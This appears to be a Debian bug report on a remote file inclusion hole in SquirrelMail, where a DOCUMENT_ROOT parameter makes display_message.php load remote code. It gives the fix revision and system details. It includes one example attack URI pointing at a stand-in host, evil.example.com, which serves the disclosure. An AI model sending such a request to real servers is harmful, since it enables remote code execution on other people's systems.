Package: squirrelmail
Version: 1:1.2.6-1.4
Severity: grave
Justification: user security hole
Tags: security

An attacker can attach DOCUMENT_ROOT to a SquirrelMail URI (eg,
/src/redirect.php?DOCUMENT_ROOT=http://evil.example.com).  If
register_globals and allow_url_fopen are on (they are by default in the
stable php4) then functions/display_message.php will include the
attacker's script, allowing access as www-data.

There is a fix in version 1.48.2.1 of display_message.php:
http://cvs.sourceforge.net/viewcvs.py/squirrelmail/squirrelmail/functions/display_messages.php?r1=1.48&r2=1.48.2.1

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux okcomputer 2.4.29 #1 SMP Thu Jan 20 20:41:12 MST 2005 i686
Locale: LANG=en_CA, LC_CTYPE=en_CA

Versions of packages squirrelmail depends on:
ii  apache                    1.3.26-0woody6 Versatile, high-performance HTTP s
ii  aspell                    0.33.7.1.1-9   A more intelligent replacement for
ii  debconf                   1.2.35         Debian configuration management sy
ii  ispell                    3.1.20-21.1    International Ispell (an interacti
ii  perl                      5.6.1-8.8      Larry Wall's Practical Extraction 
ii  php4                      4:4.1.2-7.0.1  A server-side, HTML-embedded scrip
ii  wwwconfig-common          0.0.19         Debian web auto configuration.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to